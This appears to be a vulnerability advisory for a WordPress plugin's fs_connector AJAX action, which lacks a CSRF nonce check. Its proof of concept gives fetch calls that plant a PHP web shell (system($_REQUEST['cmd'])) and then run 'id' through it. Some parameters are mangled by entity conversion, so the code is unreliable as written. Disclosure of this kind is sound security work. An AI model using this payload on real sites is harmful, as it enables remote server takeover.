Description The plugin does not properly check the CSRF nonce in the fs_connector
AJAX action. This allows attackers to make highly privileged users perform unwanted file system actions via CSRF attacks by using GET requests, such as uploading a web shell.
As a Super Admin, run the following code in the browser console (note that the requests do not require nonces): await fetch( “/wp-admin/admin-ajax.php?action=fs_connector&cmd;=mkfile&name;=shell.php⌖=l1_Lw” ); await fetch( “/wp-admin/admin-ajax.php?action=fs_connector&cmd;=put⌖=l1_c2hlbGwucGhw&content;=%3C?php%20echo%20system($_REQUEST%5B’cmd’%5D);” ); Now a logged-out attacker may access shell.php
as follows: await (await fetch( “/shell.php?cmd=id” ) ).text()
CPE | Name | Operator | Version |
---|---|---|---|
eq | 1.8 |